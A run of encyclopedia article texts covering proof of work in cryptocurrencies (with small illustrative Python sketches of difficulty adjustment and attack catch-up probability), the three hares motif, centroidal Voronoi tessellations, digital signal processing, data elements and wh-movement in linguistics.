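    A larger target means easier puzzles: if blocks arrived too fast,
    the target shrinks (difficulty rises), and vice versa, with the
    adjustment clamped to a factor of 4 in either direction."""
    ratio = actual_timespan_s / expected_timespan_s
    ratio = max(0.25, min(4.0, ratio))
    return int(old_target * ratio)
```

For example, if the last window of blocks took only one week instead of two, the target halves, doubling the expected work per block.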
However, Bitcoin was not perfect. Miners began exploiting Bitcoin's proof of work with specialized hardware such as ASICs. Initially mined with standard CPUs, Bitcoin saw a rapid transition to GPUs and then to ASICs, which vastly outperformed general-purpose hardware in solving SHA-256 puzzles. This gave ASIC miners an overwhelming advantage, rendering casual participants insignificant and undermining Bitcoin's initial vision of a decentralized network accessible to all.
To address Bitcoin's increasing reliance on specialized hardware, proof of work evolved further with the introduction of Litecoin in 2011, which adopted the Scrypt algorithm. Developed by Colin Percival and detailed in the technical specification "The scrypt Password-Based Key Derivation Function,"[15] Scrypt was designed as a memory-intensive algorithm, requiring significant RAM to perform its computations. Unlike Bitcoin's SHA-256, which favored powerful ASICs, Scrypt aimed to level the playing field by making mining more accessible to users with general-purpose hardware through heightened memory demands. Over time, however, advancements in hardware led to the creation of Scrypt-specific ASICs, shifting the advantage back toward specialized hardware and undercutting the algorithm's decentralization goal.
There are two classes of proof-of-work protocols.
Known-solution protocols tend to have slightly lower variance than unbounded probabilistic protocols because the variance of a rectangular distribution is lower than the variance of a Poisson distribution (with the same mean). A generic technique for reducing variance is to use multiple independent sub-challenges, as the average of multiple samples will have a lower variance.
There are also fixed-cost functions such as the time-lock puzzle.
Moreover, the underlying functions used by these schemes may be:
Finally, some PoW systems offershortcutcomputations that allow participants who know a secret, typically a private key, to generate cheap PoWs. The rationale is that mailing-list holders may generate stamps for every recipient without incurring a high cost. Whether such a feature is desirable depends on the usage scenario.
Here is a list of known proof-of-work functions:
At theIACRconference Crypto 2022 researchers presented a paper describing Ofelimos, a blockchain protocol with aconsensus mechanismbased on "proof of useful work" (PoUW). Rather than miners consuming energy in solving complex, but essentially useless, puzzles to validate transactions, Ofelimos achieves consensus while simultaneously providing a decentralizedoptimization problem solver. The protocol is built around Doubly Parallel Local Search (DPLS), a local search algorithm that is used as the PoUW component. The paper gives an example that implements a variant ofWalkSAT, a local search algorithm to solve Boolean problems.[29]
In 2009, the Bitcoin network went online. Bitcoin is a proof-of-work digital currency that, like Finney's RPoW, is based on the Hashcash PoW. In Bitcoin, however, double-spend protection is provided by a decentralized P2P protocol for tracking transfers of coins, rather than by the trusted-hardware computing function used by RPoW, so Bitcoin's trustworthiness rests on computation. Bitcoins are "mined" using the Hashcash proof-of-work function by individual miners and verified by the decentralized nodes in the P2P Bitcoin network. The difficulty is periodically adjusted to keep the block time around a target time.[30]
Since the creation of Bitcoin, proof-of-work has been the predominant design ofpeer-to-peercryptocurrency. Studies have estimated the total energy consumption of cryptocurrency mining.[32]The PoW mechanism requires a vast amount of computing resources, which consume a significant amount of electricity. 2018 estimates from theUniversity of Cambridgeequate Bitcoin's energy consumption to that ofSwitzerland.[5]
Each block that is added to the blockchain, starting with the block containing a given transaction, is called a confirmation of that transaction. Ideally, merchants and services that receive payment in the cryptocurrency should wait for at least one confirmation to be distributed over the network, before assuming that the payment was done. The more confirmations that the merchant waits for, the more difficult it is for an attacker to successfully reverse the transaction in a blockchain—unless the attacker controls more than half the total network power, in which case it is called a51% attack.[33]
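Nakamoto's whitepaper quantifies the value of confirmations with a gambler's-ruin argument: an attacker controlling a fraction q of the hash power (q < 0.5) who is z blocks behind eventually overtakes the honest chain with probability (q/p)^z, where p = 1 − q. A small sketch (the function name is ours):

```python
def catch_up_probability(q: float, z: int) -> float:
    """Probability that an attacker with hash-power share q (< 0.5)
    ever catches up from z blocks behind: (q / p) ** z with p = 1 - q.
    Gambler's-ruin result from the Bitcoin whitepaper."""
    p = 1.0 - q
    return (q / p) ** z

# Each additional confirmation shrinks the reversal probability
# geometrically -- here by a factor of 1/9 per block for q = 0.1.
probs = [catch_up_probability(0.1, z) for z in range(1, 6)]
```

For q ≥ 0.5 the formula no longer applies: the attacker catches up with probability 1, which is exactly the 51% attack described above.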
Within the Bitcoin community there are groups working together inmining pools.[34]Some miners useapplication-specific integrated circuits(ASICs) for PoW.[35]This trend toward mining pools and specialized ASICs has made mining some cryptocurrencies economically infeasible for most players without access to the latest ASICs, nearby sources of inexpensive energy, or other special advantages.[36]
Some PoWs claim to be ASIC-resistant,[37]i.e. to limit the efficiency gain that an ASIC can have over commodity hardware, like a GPU, to be well under an order of magnitude. ASIC resistance has the advantage of keeping mining economically feasible on commodity hardware, but also contributes to the corresponding risk that an attacker can briefly rent access to a large amount of unspecialized commodity processing power to launch a51% attackagainst a cryptocurrency.[38]
By design, Bitcoin's Proof of Work consensus algorithm is vulnerable to Majority Attacks (51% attacks). Any miner with over 51% of mining power is able to control the canonical chain until their hash power falls below 50%. This allows them to reorg the blockchain, double-spend, censor transactions, and completely control block production.[citation needed]
Bitcoin's security is asymmetric: miners control its security, but they are not necessarily the same people who hold bitcoin. Unlike with Proof of Stake, under Proof of Work there is a much weaker economic incentive for those who control security to protect the network. Historically, many Proof of Work networks with low security budgets have fallen to 51% attacks,[39] which highlights this asymmetry.
The amount of protection provided by PoW mining is close to the security budget of the network, which is roughly equal to the total block reward. With each additional halving, Bitcoin's security budget continues to fall relative to its market cap. In the past, Bitcoin developers were hopeful that transaction fees would rise to replace the declining block subsidy, but this has not been the case as transaction fees still only generate 1% of the total block reward.[40]There are concerns that Bitcoin's security is unsustainable in the long run due to the declining security budget caused by its halvings.
Miners compete to solve cryptographic challenges on the Bitcoin blockchain, and their solutions must be agreed upon by all nodes to reach consensus. The solutions are then used to validate transactions, add blocks and generate new bitcoins, and miners are rewarded for solving these puzzles and successfully adding new blocks. However, Bitcoin-style mining is very energy-intensive because proof of work operates like a lottery mechanism. The underlying computational work has no use other than to secure a network that provides open access and must operate under adversarial conditions. Miners must expend a great deal of energy to add a new block containing a transaction to the blockchain, and the energy used in this competition is what fundamentally gives Bitcoin its level of security and resistance to attacks. Miners must also invest in computer hardware that requires large physical space as a fixed cost.[41]
In January 2022, Vice-Chair of the European Securities and Markets Authority Erik Thedéen called on the EU to ban the proof-of-work model in favor of the proof-of-stake model due to its lower energy emissions.[42]
In November 2022, the state of New York enacted a two-year moratorium on cryptocurrency mining that does not completely use renewable energy as a power source. Existing mining companies will be grandfathered in and may continue mining without the use of renewable energy, but they will not be allowed to expand or renew permits with the state, and no new mining companies that do not completely use renewable energy will be allowed to begin mining.[43]
|
https://en.wikipedia.org/wiki/Proof_of_work
|
Thethree hares(orthree rabbits) is a circularmotifappearing insacred sitesfromEast Asia, theMiddle Eastand the churches ofDevon, England (as the "Tinners' Rabbits"),[1]and historical synagogues in Europe.[2][better source needed]It is used as an architecturalornament, a religioussymbol, and in other modernworks of art[3][4]or a logo foradornment(includingtattoos),[5]jewelry, and acoat of armson anescutcheon.[6][7]It is viewed as a puzzle, a visual challenge, and has been rendered as sculpture, drawing, and painting.
The symbol features threeharesorrabbitschasing each other in a circle. Like thetriskelion,[8]thetriquetra, and their antecedents (e.g., thetriple spiral), the symbol of the three hares has a threefoldrotational symmetry. Each of the ears is shared by two hares, so that only three ears are shown. Although its meaning is apparently not explained in contemporary written sources from any of the medieval cultures where it is found, it is thought to have a range of symbolic or mystical associations with fertility and thelunar cycle. When used in Christian churches, it is presumed to be a symbol of theTrinity. Its origins and original significance are uncertain, as are the reasons why it appears in such diverse locations.[1]
The earliest occurrences appear to be in cave temples in China, dated to the Sui dynasty (6th to 7th centuries).[9][10] The iconography spread along the Silk Road (see Aurel Stein).[11] In other contexts the metaphor has been given different meanings. For example, Guan Youhui, a retired researcher from the Dunhuang Academy who spent 50 years studying the decorative patterns in the Mogao Caves, believes the three rabbits—"like many images in Chinese folk art that carry auspicious symbolism—represent peace and tranquility".[9][10] The hares have also appeared in Lotus motifs.[12]
The three hares appear on 13th centuryMongolmetalwork, and on a copper coin, found inIran, dated to 1281.[13][14][15]
Another appears on an ancient Islamic-madereliquaryfrom southern Russia. Another 13th or early 14th century box, later used as a reliquary, was made inIranunderMongolrule, and is preserved in the treasury of theCathedral of Trierin Germany. On its base, the casket has Islamic designs, and originally featured two images of the three hares. One was lost through damage.[16]
One theory pertaining to the spread of the motif is that it was transported from China across Asia and as far as the south west of England by merchants travelling the Silk Road and that the motif was transported via designs found on expensiveOriental ceramics. This view is supported by the early date of the surviving occurrences in China. However, the majority of representations of the three hares in churches occur in England and northern Germany. This supports a contrary view that the three hares occurred independently as English or early German symbols.[1][9][10][17]
Some claim that the Devon name, Tinners' Rabbits, is related to localtin minersadopting it. The mines generated wealth in the region and funded the building and repair of many local churches, and thus the symbol may have been used as a sign of the miners' patronage.[18]Thearchitectural ornamentof the three hares also occurs in churches that are unrelated to the miners of South West England. Other occurrences in England include floor tiles atChester Cathedral,[19]stained glass atLong Melford, Suffolk[A]and a ceiling inScarborough, Yorkshire.[1]
The motif of the three hares is used in a number of medieval or more recent European churches, particularly in France (e.g., in theBasilica of Notre-Dame de FourvièreinLyon)[20]and Germany. It occurs with the greatest frequency in the churches ofDevon, United Kingdom, where it appears to be a recollection of earlierInsular Celticdesign such as thetriaxially symmetrictriskeleand otherRomano-Britishdesigns which are known from early British 'Celtic' (La Tène) metalwork such as circular enamelled and openwork triskel brooches (fibulae). The motif appears inilluminated manuscriptsamongst similar devices such as the anthropomorphic "beard pullers" seen in manuscripts such as theBook of Kells,[21]architecturalwood carving,stone carving, windowtracery, andstained glass. In South Western England there are over thirty recorded examples of the three hares appearing on 'roof bosses' (carved wooden knobs) on the ceilings inmedievalchurches inDevon, (particularlyDartmoor). There is a good example of a roof boss of the three hares atWidecombe-in-the-Moor,[8]Dartmoor, with another in the town ofTavistockon the edge of the moor. Themotifoccurs with similar central placement in Synagogues.[2]Another occurrence is on theossuarythat by tradition contained the bones ofSt. Lazarus.[22]
Where it occurs in the United Kingdom, the three hares motif usually appears in a prominent place in the church, such as the central rib of thechancelroof, or on a central rib of thenave. This suggests that the symbol held significance to the church, and casts doubt on the theory that they may have been a masons' or carpenters' signature marks.[1]There are two possible and perhaps concurrent reasons why the three hares may have found popularity as a symbol within the church. Firstly, it was widely believed that the hare washermaphroditeand could reproduce without loss ofvirginity.[16]This led to an association with theVirgin Mary, with hares sometimes occurring inilluminated manuscriptsandNorthern Europeanpaintings of the Virgin andChrist Child. The other Christian association may have been with theHoly Trinity,[16][23][unreliable source?]representing the"One in Three and Three in One"of which the triangle or three interlocking shapes such as rings are common symbols. In many locations the three hares are positioned adjacent to theGreen Man, a symbol commonly believed to be associated with the continuance ofAnglo-SaxonorCelticpaganism.[24]These juxtapositions may have been created to imply the contrast of the Divine with man'ssinful, earthly nature.[16]
In Judaism, the shafan in Hebrew has symbolic meaning.[B][C] Rabbits can carry positive symbolic connotations, like lions and eagles. The 16th-century German scholar Rabbi Yosef Hayim Yerushalmi saw the rabbits as a symbol of the Jewish diaspora. The replica of the Chodorow Synagogue from Poland (on display at the Museum of the Jewish Diaspora in Tel Aviv) has a ceiling with a large central painting depicting a double-headed eagle holding two brown rabbits in its claws without harming them. The painting is surrounded by a citation from the end of Deuteronomy:
כנשר יעיר קינו על גוזליו ירחף. יפרוש כנפיו יקחהו ישאהו על אברתו
This may be translated: "As an eagle that stirreth up her nest, hovereth over her young, spreadeth abroad her wings, taketh them, beareth them on her pinions (...thus isGodto the Jewish people)."[2]
The hare frequently appears in the form of the symbol of the rotating rabbits. An ancient Germanriddledescribes this graphic thus:
There are three hares and only three ears,and yet each hare has two.[26][2]
This curious graphic riddle can be found in all of the famous wooden synagogues from the 17th and 18th centuries in the Ashkenaz region (in Germany) that are on museum display in the Beth Hatefutsoth Museum in Tel Aviv, the Jewish Museum Berlin and the Israel Museum in Jerusalem. They also appear in the synagogue from Horb am Neckar (donated to the Israel Museum). The three animals adorn the wooden panels of the prayer room from Unterlimpurg near Schwäbisch Hall, which may be seen in replica in the Jewish Museum Berlin. They are also seen in a main exhibit of the Diaspora Museum in Tel Aviv. Israeli art historian Ida Uberman wrote about this house of worship: "... Here we find depictions of three kinds of animals, all organized in circles: eagles, fishes and hares. These three represent the Kabbalistic elements of the world: earth, water and fire/heavens... The fact that they are always three is important, for that number . . . is important in the Kabbalistic context".[2]
Not only do they appear among floral and animal ornaments, but they are often in a distinguished location, directly above theTorah ark, the place where theholy scripturesrepose.[2]
They appear onheadstonesinSataniv(Сатанів),Khmelnytsky Oblast, westernUkraine.[27][28]
Jurgis Baltrusaitis's 1955Le Moyen-Âge fantastique: Antiquités et exotismes dans l'art gothique[29]includes a 1576 Dutchengravingwith the puzzle given in Dutch and French around the image. This is the oldest known dated example of the motif as a puzzle, with a caption that translates as:
The secret is not great when one knows it.But it is something to one who does it.Turn and turn again and we will also turn,So that we give pleasure to each of you.And when we have turned, count our ears,It is there, without any disguise, you will find a marvel.[17]
One recent philosophical book poses it as a problem in perception and anoptical illusion—an example ofcontour rivalry. Each rabbit can be individually seen as correct—it is only when you try to see all three at once that you see the problem with defining the hares' ears. This is similar to "The ImpossibleTribar" byRoger Penrose,[17]originated byOscar Reutersvärd. CompareM.C. Escher'simpossible object.
|
https://en.wikipedia.org/wiki/Three_hares
|
Ingeometry, acentroidal Voronoi tessellation(CVT) is a special type ofVoronoi tessellationin which the generating point of each Voronoi cell is also itscentroid(center of mass). It can be viewed as an optimal partition corresponding to an optimal distribution of generators. A number of algorithms can be used to generate centroidal Voronoi tessellations, includingLloyd's algorithmforK-means clusteringorQuasi-Newton methodslikeBFGS.[1]
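For intuition, Lloyd's algorithm is easy to sketch in one dimension with a uniform density on [0, 1]: each Voronoi cell is the interval bounded by the midpoints between neighboring generators, and under uniform density its centroid is the interval's midpoint. The code below is an illustrative sketch (names are ours), not a production implementation.

```python
def lloyd_1d(points, iterations=100):
    """Lloyd's algorithm for a 1D CVT on [0, 1] with uniform density.
    Each pass: build the Voronoi cells (intervals split at midpoints
    between neighboring generators), then move each generator to its
    cell's centroid, which here is the interval midpoint."""
    pts = sorted(points)
    n = len(pts)
    for _ in range(iterations):
        bounds = ([0.0]
                  + [(pts[i] + pts[i + 1]) / 2 for i in range(n - 1)]
                  + [1.0])
        pts = [(bounds[i] + bounds[i + 1]) / 2 for i in range(n)]
    return pts

# The generators drift to the equally spaced configuration
# [1/6, 1/2, 5/6], where each point is the centroid of its own cell.
cvt = lloyd_1d([0.1, 0.15, 0.7])
```

In higher dimensions the same fixed-point iteration applies, but the cells and centroids must be computed from an actual Voronoi diagram (or estimated by K-means over sample points).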
Gersho's conjecture, proven for one and two dimensions, says that "asymptotically speaking, all cells of the optimal CVT, while forming atessellation, arecongruentto a basic cell which depends on the dimension."[2]
In two dimensions, the basic cell of the optimal CVT is a regular hexagon, reflecting the fact that the hexagonal lattice gives the densest packing of circles in 2D Euclidean space.
Its three-dimensional equivalent is the rhombic dodecahedral honeycomb, derived from the densest packing of spheres in 3D Euclidean space.
Centroidal Voronoi tessellations are useful indata compression, optimalquadrature, optimalquantization,clustering, and optimal mesh generation.[3]
A weighted centroidal Voronoi diagram is a CVT in which each centroid is weighted according to a certain function. For example, a grayscale image can be used as a density function to weight the points of a CVT, as a way to create digital stippling.[4]
Manypatterns seen in natureare closely approximated by a centroidal Voronoi tessellation. Examples of this include theGiant's Causeway, the cells of thecornea,[5]and the breeding pits of the maletilapia.[3]
|
https://en.wikipedia.org/wiki/Centroidal_Voronoi_tessellation
|
Digital signal processing(DSP) is the use ofdigital processing, such as by computers or more specializeddigital signal processors, to perform a wide variety ofsignal processingoperations. Thedigital signalsprocessed in this manner are a sequence of numbers that representsamplesof acontinuous variablein a domain such as time, space, or frequency. Indigital electronics, a digital signal is represented as apulse train,[1][2]which is typically generated by the switching of atransistor.[3]
Digital signal processing andanalog signal processingare subfields of signal processing. DSP applications includeaudioandspeech processing,sonar,radarand othersensor arrayprocessing,spectral density estimation,statistical signal processing,digital image processing,data compression,video coding,audio coding,image compression, signal processing fortelecommunications,control systems,biomedical engineering, andseismology, among others.
DSP can involve linear or nonlinear operations. Nonlinear signal processing is closely related tononlinear system identification[4]and can be implemented in thetime,frequency, andspatio-temporal domains.
The application of digital computation to signal processing allows for many advantages over analog processing in many applications, such aserror detection and correctionin transmission as well asdata compression.[5]Digital signal processing is also fundamental todigital technology, such asdigital telecommunicationandwireless communications.[6]DSP is applicable to bothstreaming dataand static (stored) data.
To digitally analyze and manipulate an analog signal, it must be digitized with ananalog-to-digital converter(ADC).[7]Sampling is usually carried out in two stages,discretizationandquantization. Discretization means that the signal is divided into equal intervals of time, and each interval is represented by a single measurement of amplitude. Quantization means each amplitude measurement is approximated by a value from a finite set. Roundingreal numbersto integers is an example.
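The two stages can be sketched directly: sample a continuous-time signal at a fixed rate (discretization), then round each amplitude to one of a finite set of uniformly spaced levels (quantization). The function and parameter names below are illustrative, not from any particular ADC API.

```python
import math

def digitize(signal, fs, duration, levels, full_scale=1.0):
    """Sample `signal` (a function of time, in seconds) at rate `fs` Hz,
    then quantize each sample to one of `levels` uniformly spaced
    values spanning [-full_scale, +full_scale]."""
    step = 2 * full_scale / (levels - 1)
    samples = []
    for n in range(int(duration * fs)):
        x = signal(n / fs)           # discretization: one reading per interval
        q = round(x / step) * step   # quantization: round to the nearest level
        samples.append(q)
    return samples

# A 1 kHz sine sampled at 8 kHz for 1 ms, quantized to 16 levels (4 bits)
out = digitize(lambda t: math.sin(2 * math.pi * 1000 * t), 8000, 0.001, 16)
```

The rounding step bounds the quantization error by half a level spacing, which is the source of quantization noise in a real converter.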
The Nyquist–Shannon sampling theorem states that a signal can be exactly reconstructed from its samples if the sampling frequency is greater than twice the highest frequency component in the signal. In practice, the sampling frequency is often significantly higher than this.[8] It is common to use an anti-aliasing filter to limit the signal bandwidth to comply with the sampling theorem; however, careful selection of this filter is required, because the reconstructed signal will be the filtered signal plus residual aliasing from imperfect stop-band rejection, rather than the original (unfiltered) signal.
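A quick numeric check of why the anti-aliasing filter matters: at a 10 Hz sampling rate (Nyquist limit 5 Hz), a 9 Hz sine produces exactly the same sample values as a negated 1 Hz sine, since sin(2π·9n/10) = sin(2πn − 2πn/10) = −sin(2πn/10). After sampling, the two signals are indistinguishable.

```python
import math

fs = 10.0       # sampling rate in Hz; Nyquist limit is fs / 2 = 5 Hz
n_samples = 20

# A 9 Hz sine violates the sampling theorem at fs = 10 Hz ...
high = [math.sin(2 * math.pi * 9 * n / fs) for n in range(n_samples)]

# ... and yields exactly the samples of a negated 1 Hz sine (its alias).
alias = [-math.sin(2 * math.pi * 1 * n / fs) for n in range(n_samples)]

assert all(abs(a - b) < 1e-9 for a, b in zip(high, alias))
```

Any 9 Hz energy that leaks past an imperfect anti-aliasing filter therefore appears as spurious 1 Hz content in the reconstructed signal.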
Theoretical DSP analyses and derivations are typically performed ondiscrete-time signalmodels with no amplitude inaccuracies (quantization error), created by the abstract process ofsampling. Numerical methods require a quantized signal, such as those produced by an ADC. The processed result might be a frequency spectrum or a set of statistics. But often it is another quantized signal that is converted back to analog form by adigital-to-analog converter(DAC).
DSP engineers usually study digital signals in one of the following domains:time domain(one-dimensional signals), spatial domain (multidimensional signals),frequency domain, andwaveletdomains. They choose the domain in which to process a signal by making an informed assumption (or by trying different possibilities) as to which domain best represents the essential characteristics of the signal and the processing to be applied to it. A sequence of samples from a measuring device produces a temporal or spatial domain representation, whereas adiscrete Fourier transformproduces the frequency domain representation.
Time domainrefers to the analysis of signals with respect to time. Similarly, space domain refers to the analysis of signals with respect to position, e.g., pixel location for the case of image processing.
The most common processing approach in the time or space domain is enhancement of the input signal through a method called filtering.Digital filteringgenerally consists of some linear transformation of a number of surrounding samples around the current sample of the input or output signal. The surrounding samples may be identified with respect to time or space. The output of a linear digital filter to any given input may be calculated byconvolvingthe input signal with animpulse response.
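The convolution just described can be written out directly. This is a naive direct-form sketch (fast implementations use the FFT); the example taps form a simple 3-point moving average.

```python
def fir_filter(x, h):
    """Convolve input x with impulse response h (direct form):
    y[n] = sum over k of h[k] * x[n - k]."""
    y = []
    for n in range(len(x) + len(h) - 1):
        acc = 0.0
        for k, hk in enumerate(h):
            if 0 <= n - k < len(x):   # treat samples outside x as zero
                acc += hk * x[n - k]
        y.append(acc)
    return y

# A 3-tap moving average spreads an isolated spike over three samples.
smoothed = fir_filter([0, 0, 3, 0, 0], [1 / 3, 1 / 3, 1 / 3])
```

Because the impulse response here is finite, the filter is an FIR filter and is unconditionally stable; an IIR filter would instead feed previous outputs back into the sum.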
Signals are converted from time or space domain to the frequency domain usually through use of theFourier transform. The Fourier transform converts the time or space information to a magnitude and phase component of each frequency. With some applications, how the phase varies with frequency can be a significant consideration. Where phase is unimportant, often the Fourier transform is converted to the power spectrum, which is the magnitude of each frequency component squared.
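The magnitude-squared spectrum can be sketched with a direct (O(N²)) discrete Fourier transform; practical code would use an FFT, but the result is the same.

```python
import cmath
import math

def power_spectrum(x):
    """Direct DFT of x followed by |X[k]|**2 per frequency bin,
    discarding the phase information."""
    N = len(x)
    return [abs(sum(x[n] * cmath.exp(-2j * math.pi * k * n / N)
                    for n in range(N))) ** 2
            for k in range(N)]

# A pure cosine at bin 2 of a 16-point DFT concentrates its power in
# bins 2 and 14 (= N - 2), each with (N / 2)**2 = 64.
N = 16
x = [math.cos(2 * math.pi * 2 * n / N) for n in range(N)]
p = power_spectrum(x)
```

The mirrored peak at bin N − 2 is the negative-frequency component of the real-valued cosine; for real inputs the spectrum is always symmetric in this way.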
The most common purpose for analysis of signals in the frequency domain is analysis of signal properties. The engineer can study the spectrum to determine which frequencies are present in the input signal and which are missing. Frequency domain analysis is also called spectrum or spectral analysis.
Filtering, particularly in non-real-time work, can also be achieved in the frequency domain by applying the filter there and then converting back to the time domain. This can be an efficient implementation and can give essentially any filter response, including excellent approximations to brickwall filters.
There are some commonly used frequency domain transformations. For example, thecepstrumconverts a signal to the frequency domain through Fourier transform, takes the logarithm, then applies another Fourier transform. This emphasizes the harmonic structure of the original spectrum.
Digital filters come in bothinfinite impulse response(IIR) andfinite impulse response(FIR) types. Whereas FIR filters are always stable, IIR filters have feedback loops that may become unstable and oscillate. TheZ-transformprovides a tool for analyzing stability issues of digital IIR filters. It is analogous to theLaplace transform, which is used to design and analyze analog IIR filters.
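The stability issue can be seen in the simplest IIR filter, y[n] = a·y[n−1] + x[n], whose transfer function H(z) = 1/(1 − a·z⁻¹) has a single pole at z = a. The filter is stable exactly when the pole lies inside the unit circle (|a| < 1), as this sketch demonstrates:

```python
def one_pole_impulse_response(a, n_samples):
    """Impulse response of the one-pole IIR filter y[n] = a*y[n-1] + x[n].
    Its Z-transform pole sits at z = a, so the response is a**n:
    decaying (stable) iff |a| < 1, growing (unstable) otherwise."""
    y, prev = [], 0.0
    for n in range(n_samples):
        x = 1.0 if n == 0 else 0.0   # unit impulse input
        prev = a * prev + x          # the feedback loop
        y.append(prev)
    return y

stable = one_pole_impulse_response(0.5, 10)    # 1, 0.5, 0.25, ... -> 0
unstable = one_pole_impulse_response(1.5, 10)  # 1, 1.5, 2.25, ... grows
```

An FIR filter has no such feedback term, which is why it cannot oscillate regardless of its coefficients.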
A signal is represented as a linear combination of its previous samples; the coefficients of the combination are called autoregression coefficients. This method has higher frequency resolution and can process shorter signals than the Fourier transform.[9] Prony's method can be used to estimate the frequencies, amplitudes, initial phases and decays of the components of a signal.[10][9] The components are assumed to be complex decaying exponentials.[10][9]
A time-frequency representation of signal can capture both temporal evolution and frequency structure of analyzed signal. Temporal and frequency resolution are limited by the principle of uncertainty and the tradeoff is adjusted by the width of analysis window. Linear techniques such asShort-time Fourier transform,wavelet transform,filter bank,[11]non-linear (e.g.,Wigner–Ville transform[10]) andautoregressivemethods (e.g. segmented Prony method)[10][12][13]are used for representation of signal on the time-frequency plane. Non-linear and segmented Prony methods can provide higher resolution, but may produce undesirable artifacts. Time-frequency analysis is usually used for analysis of non-stationary signals. For example, methods offundamental frequencyestimation, such as RAPT and PEFAC[14]are based on windowed spectral analysis.
Innumerical analysisandfunctional analysis, adiscrete wavelet transformis anywavelet transformfor which thewaveletsare discretely sampled. As with other wavelet transforms, a key advantage it has overFourier transformsis temporal resolution: it captures both frequencyandlocation information. The accuracy of the joint time-frequency resolution is limited by theuncertainty principleof time-frequency.
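One level of the simplest discrete wavelet transform, the Haar DWT, illustrates the idea: normalized pairwise sums give the low-frequency approximation coefficients, normalized pairwise differences give the localized detail coefficients, and the step is exactly invertible. This is a sketch for even-length inputs only.

```python
import math

def haar_step(x):
    """One level of the Haar DWT: returns (approximation, detail)
    coefficients for an even-length sequence x."""
    s = math.sqrt(2)
    approx = [(x[i] + x[i + 1]) / s for i in range(0, len(x), 2)]
    detail = [(x[i] - x[i + 1]) / s for i in range(0, len(x), 2)]
    return approx, detail

def haar_inverse(approx, detail):
    """Exactly invert one Haar step."""
    s = math.sqrt(2)
    x = []
    for a, d in zip(approx, detail):
        x.extend([(a + d) / s, (a - d) / s])
    return x

a, d = haar_step([4.0, 2.0, 5.0, 5.0])
```

Each detail coefficient is tied to a specific pair of input samples, which is the "location information" a plain Fourier transform lacks; note that the constant pair (5.0, 5.0) produces a zero detail coefficient.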
Empirical mode decomposition is based on decomposing a signal into intrinsic mode functions (IMFs). IMFs are quasi-harmonic oscillations that are extracted from the signal.[15]
DSPalgorithmsmay be run on general-purpose computers[16]anddigital signal processors.[17]DSP algorithms are also implemented on purpose-built hardware such asapplication-specific integrated circuit(ASICs).[18]Additional technologies for digital signal processing include more powerful general-purposemicroprocessors,graphics processing units,field-programmable gate arrays(FPGAs),digital signal controllers(mostly for industrial applications such as motor control), andstream processors.[19]
For systems that do not have areal-time computingrequirement and the signal data (either input or output) exists in data files, processing may be done economically with a general-purpose computer. This is essentially no different from any otherdata processing, except DSP mathematical techniques (such as theDCTandFFT) are used, and the sampled data is usually assumed to be uniformly sampled in time or space. An example of such an application is processingdigital photographswith software such asPhotoshop.
When the application requirement is real-time, DSP is often implemented using specialized or dedicated processors or microprocessors, sometimes using multiple processors or multiple processing cores. These may process data using fixed-point arithmetic or floating point. For more demanding applicationsFPGAsmay be used.[20]For the most demanding applications or high-volume products,ASICsmight be designed specifically for the application.
Parallel implementations of DSP algorithms, utilizing multi-core CPU and many-core GPU architectures, have been developed to improve the latency of these algorithms.[21]
Native processingis done by the computer's CPU rather than by DSP or outboard processing, which is done by additional third-party DSP chips located on extension cards or external hardware boxes or racks. Manydigital audio workstationssuch asLogic Pro,Cubase,Digital PerformerandPro ToolsLE use native processing. Others, such asPro ToolsHD,Universal Audio's UAD-1 andTC Electronic's Powercore use DSP processing.
General application areas for DSP include
Specific examples includespeech codingand transmission in digitalmobile phones,room correctionof sound inhi-fiandsound reinforcementapplications, analysis and control ofindustrial processes,medical imagingsuch asCATscans andMRI,audio crossoversandequalization,digital synthesizers, audioeffects unitsand mobile audio surveillance platforms such as Hypatia, a real-time encrypted emergency response application.[22][23]DSP has been used inhearing aidtechnology since 1996, which allows for automatic directional microphones, complex digitalnoise reduction, and improved adjustment of thefrequency response.[24]
|
https://en.wikipedia.org/wiki/Digital_signal_processing
|
Inmetadata, the termdata elementis an atomic unit of data that has precise meaning or precise semantics. A data element has:
Data elements usage can be discovered by inspection ofsoftware applicationsor applicationdata filesthrough a process of manual or automatedApplication Discovery and Understanding. Once data elements are discovered they can be registered in ametadata registry.
Intelecommunications, the termdata elementhas the following components:
In the areas ofdatabasesanddata systemsmore generally a data element is a concept forming part of adata model. As an element of data representation, a collection of data elements forms adata structure.[1]
In practice, data elements (fields, columns, attributes, etc.) are sometimes "overloaded", meaning a given data element will have multiple potential meanings. While a known bad practice, overloading is nevertheless a very real factor or barrier to understanding what a system is doing.
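A toy illustration of overloading (all field names and values are invented): a single "code" element whose meaning depends on another field has imprecise semantics, and registering one entry per meaning, as a metadata registry would, restores a precise definition for each.

```python
# An overloaded data element: the "code" column means different things
# depending on the record type, so the element alone is ambiguous.
records = [
    {"type": "order",  "code": "S"},   # here "S" means shipped
    {"type": "refund", "code": "S"},   # here "S" means store credit
]

# Registering one data element per meaning (keyed by its context)
# gives each value precise semantics, as in a metadata registry.
registry = {
    ("order", "S"): "shipped",
    ("refund", "S"): "store_credit",
}

meanings = [registry[(r["type"], r["code"])] for r in records]
```

Discovering which contexts a field actually varies over is exactly the kind of analysis performed during Application Discovery and Understanding.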
|
https://en.wikipedia.org/wiki/Data_element
|
Inlinguistics,wh-movement(also known aswh-fronting,wh-extraction, orwh-raising) is the formation ofsyntacticdependencies involvinginterrogativewords. An example in English is the dependency formed betweenwhatand the object position ofdoingin "What are you doing?". Interrogative forms are sometimes known within English linguistics aswh-words, such aswhat,when,where,who, andwhy, but also include other interrogative words, such ashow. This dependency has been used as a diagnostic tool in syntactic studies as it can be observed to interact with other grammatical constraints.
In languages with wh-movement, sentences or clauses with a wh-word show a non-canonical word order that places the wh-word (or phrase containing the wh-word) at or near the front of the sentence or clause ("Whomare you thinking about?") instead of the canonical position later in the sentence ("I am thinking aboutyou"). Leaving the wh-word in its canonical position is calledwh-in-situand in English occurs in echo questions andpolar questionsin informal speech.
Wh-movement is one of the most studied forms oflinguistic discontinuity.[1]It is observed in many languages and plays a key role in the theories of long-distance dependencies.
The termwh-movementstemmed from earlygenerative grammarin the 1960s and 1970s and was a reference to the theory oftransformational grammar, in which the interrogative expression always appears in its canonical position in thedeep structureof a sentence but can move leftward from that position to the front of the sentence/clause in the surface structure.[2]Although other theories of syntax do not use the mechanism of movement in the transformative sense, the termwh-movement(or equivalent terms, such aswh-fronting,wh-extraction, orwh-raising) is widely used to denote the phenomenon, even in theories that do not model long-distance dependencies as a movement.
